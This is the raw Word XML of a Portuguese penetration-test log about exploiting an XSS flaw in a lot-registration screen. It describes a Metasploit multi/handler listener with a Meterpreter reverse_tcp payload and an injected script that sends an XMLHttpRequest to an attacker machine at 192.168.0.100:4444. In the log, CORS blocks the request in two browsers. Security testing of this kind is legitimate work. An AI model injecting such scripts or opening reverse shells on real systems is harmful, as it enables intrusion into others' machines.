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  <w:t xml:space="preserve">Essa atividade representa a tarefa do quadro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explorar XSS - Cadastro de Lotes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Data: 27-04-16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Horário dos testes: 1h: 30 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Horário Total: 1h:57 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Conseguir realizar um ataque bem sucedido explorando a recém descoberta falha do XSS na tela de cadastro de lotes.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Resultados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Tentativa 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Configurar o metasploit e abrir a porta e usar o código abaixo para tentar novamente o acesso.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Metasploit usando o exploit disponível em  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com o payload windows-meterpreter-reverse_tcp</w:t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Isso cria um listener que fica ouvindo conexões e quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.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8b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="220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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="00008b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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181a1c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shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="220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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r.open(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4a1c21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,’http://192.168.0.100:4444’,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="00008b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1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220" w:lineRule="auto"/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6a737c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.send();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6a737c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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8b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script&gt;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navegador Bloqueia a requisição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1549400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image02.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image0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Access-Control-Allow-Origin: http://foo.example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Tentativa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Rodar o mesmo script em outro navegador para testar se o bloqueio funciona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Usando o firefox, o bloqueio permanece.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154940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Referencias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w3c - Especificação CORS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jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image01.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cors/" TargetMode="External"/></Relationships>
</file>